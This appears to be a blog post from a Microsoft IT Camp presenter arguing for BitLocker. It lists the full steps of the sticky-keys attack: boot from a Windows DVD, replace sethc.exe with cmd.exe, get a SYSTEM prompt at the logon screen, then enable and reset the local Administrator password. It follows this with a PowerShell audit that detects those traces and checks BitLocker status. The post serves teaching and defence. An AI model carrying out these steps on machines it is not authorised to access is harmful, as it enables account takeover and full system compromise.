Today I was presenting at Microsoft IT Camp, and a question about why BitLocker should always be implemented came up. So I showed this simple demo of how Windows (and other operating systems) can be hacked if the disk is left unencrypted.
The demo was shown on the latest version of Windows 8.1 Update with all updates installed.
Some of the students asked for a guide, so they could show the demo where they work, so here it is…
1. Log in using a standard user account.
2. Show that the local Administrator account is disabled.
3. Restart the computer, and boot from a standard Windows DVD.
4. When prompted for language settings, press Shift + F10 to launch the Command Prompt.
5. Type D:
6. Navigate to D:\windows\system32
7. Type copy cmd.exe sethc.exe, and press Y to accept.
8. Restart the computer (boot from the hard disk).
9. When the logon window appears, press Shift 5 times, and the command prompt will open.
10. Type whoami to see that you now have SYSTEM rights.
11. Type net user administrator /active:yes, to activate the local administrator account.
12. Type net user administrator *, to provide a new password for the local administrator.
13. Restart the computer and log on using .\administrator
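
To check whether a machine has already been through the steps above, and whether its OS volume is protected against them, the following PowerShell audit can be run from an elevated prompt. It is an added example, not part of the original demo; the function name Get-StickyKeysAudit is hypothetical, and it assumes PowerShell 4.0 or later and the BitLocker module.

```powershell
# Added example: audits the running system for the traces the demo leaves behind.
function Get-StickyKeysAudit {
    $system32 = Join-Path $env:SystemRoot 'System32'
    $sethc    = Join-Path $system32 'sethc.exe'
    $cmd      = Join-Path $system32 'cmd.exe'

    # Step 7 makes sethc.exe a byte-for-byte copy of cmd.exe,
    # so identical SHA-256 hashes are a direct indicator.
    $replaced = $false
    if ((Test-Path -LiteralPath $sethc) -and (Test-Path -LiteralPath $cmd)) {
        $sethcHash = (Get-FileHash -LiteralPath $sethc -Algorithm SHA256).Hash
        $cmdHash   = (Get-FileHash -LiteralPath $cmd   -Algorithm SHA256).Hash
        $replaced  = ($sethcHash -eq $cmdHash)
    }

    # Step 11 enables the built-in Administrator, the local account
    # whose SID ends in -500. It is disabled at the start of the demo.
    $admin = Get-CimInstance -ClassName Win32_UserAccount -Filter "LocalAccount=True" |
        Where-Object { $_.SID -like 'S-1-5-21-*-500' }

    # BitLocker state of the OS volume. With protection on, the offline
    # file copy in steps 3 to 7 cannot be done without the recovery key.
    $bl = $null
    try {
        $bl = Get-BitLockerVolume -MountPoint $env:SystemDrive -ErrorAction Stop
    } catch {
        Write-Warning "Could not query BitLocker: $($_.Exception.Message)"
    }

    [pscustomobject]@{
        SethcPath           = $sethc
        SethcIsCopyOfCmd    = $replaced
        BuiltinAdminEnabled = if ($admin) { -not $admin.Disabled } else { $null }
        BitLockerProtection = if ($bl) { "$($bl.ProtectionStatus)" } else { 'Unknown' }
        BitLockerVolume     = if ($bl) { "$($bl.VolumeStatus)" } else { 'Unknown' }
    }
}

Get-StickyKeysAudit | Format-List
```

A healthy result shows SethcIsCopyOfCmd as False, BuiltinAdminEnabled as False, and BitLockerProtection as On.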